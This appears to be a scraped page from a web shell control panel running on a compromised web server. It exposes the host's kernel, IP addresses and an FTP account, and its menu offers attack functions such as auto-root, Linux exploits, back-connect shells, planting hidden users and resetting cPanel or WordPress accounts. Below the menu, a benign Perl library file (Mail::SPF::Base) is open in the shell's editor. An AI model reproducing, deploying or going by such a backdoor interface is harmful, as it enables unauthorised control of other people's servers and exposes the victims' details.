Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Mail /
SPF /
[ HOME SHELL ]
Name
Size
Permission
Action
Mech
[ DIR ]
drwxr-xr-x
Mod
[ DIR ]
drwxr-xr-x
v1
[ DIR ]
drwxr-xr-x
v2
[ DIR ]
drwxr-xr-x
Base.pm
3.34
KB
-rw-r--r--
Exception.pm
5.35
KB
-rw-r--r--
MacroString.pm
13.84
KB
-rw-r--r--
Mech.pm
12.83
KB
-rw-r--r--
Mod.pm
9.94
KB
-rw-r--r--
Record.pm
12.08
KB
-rw-r--r--
Request.pm
14.57
KB
-rw-r--r--
Result.pm
17.04
KB
-rw-r--r--
SenderIPAddrMech.pm
1.94
KB
-rw-r--r--
Server.pm
24.43
KB
-rw-r--r--
Term.pm
8.85
KB
-rw-r--r--
Util.pm
12.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Base.pm
# # Mail::SPF::Base # Base class for Mail::SPF classes. # # (C) 2005-2012 Julian Mehnle <julian@mehnle.net> # 2005 Shevek <cpan@anarres.org> # $Id: Base.pm 57 2012-01-30 08:15:31Z julian $ # ############################################################################## package Mail::SPF::Base; =head1 NAME Mail::SPF::Base - Base class for Mail::SPF classes =cut use warnings; use strict; use Error ':try'; use Mail::SPF::Exception; use constant TRUE => (0 == 0); use constant FALSE => not TRUE; =head1 SYNOPSIS use base 'Mail::SPF::Base'; sub new { my ($class, @options) = @_; my $self = $class->SUPER::new(@options); ... return $self; } =head1 DESCRIPTION B<Mail::SPF::Base> is a common base class for all B<Mail::SPF> classes. =head2 Constructor The following constructor is provided: =over =item B<new(%options)>: returns I<Mail::SPF::Base> Creates a new object of the class on which the constructor was invoked. The provided options are stored as key/value pairs in the new object. The C<new> constructor may also be called on an object, in which case the object is cloned. Any options provided override those from the old object. There are no common options defined in B<Mail::SPF::Base>. =cut sub new { my ($self, %options) = @_; my $new = ref($self) ? # Was new() invoked on a class or an object? { %$self, %options } # Object: clone source object, override fields. : \%options; # Class: create new object. return bless($new, $self->class); } =back =head2 Class methods The following class methods are provided: =over =item B<class>: returns I<string> Returns the class name of the class or object on which it is invoked. =cut sub class { my ($self) = @_; return ref($self) || $self; } =back =head2 Class methods The following class methods are provided: =over =item B<make_accessor($name, $readonly)>: returns I<code-ref> Creates an accessor method in the class on which it is invoked. The accessor has the given name and accesses the object field of the same name. If $readonly is B<true>, the accessor is made read-only. =cut sub make_accessor { my ($class, $name, $readonly) = @_; throw Mail::SPF::EClassMethod if ref($class); my $accessor_name = "${class}::${name}"; my $accessor; if ($readonly) { $accessor = sub { local *__ANON__ = $accessor_name; my ($self, @value) = @_; throw Mail::SPF::EInstanceMethod if not ref($self); throw Mail::SPF::EReadOnlyValue("$accessor_name is read-only") if @value; return $self->{$name}; }; } else { $accessor = sub { local *__ANON__ = $accessor_name; my ($self, @value) = @_; throw Mail::SPF::EInstanceMethod if not ref($self); $self->{$name} = $value[0] if @value; return $self->{$name}; }; } { no strict 'refs'; *{$accessor_name} = $accessor; } return $accessor; } =back =head2 Instance methods There are no common instance methods defined in B<Mail::SPF::Base>. =head1 SEE ALSO L<Mail::SPF> For availability, support, and license information, see the README file included with Mail::SPF. =head1 AUTHORS Julian Mehnle <julian@mehnle.net>, Shevek <cpan@anarres.org> =cut TRUE;
Close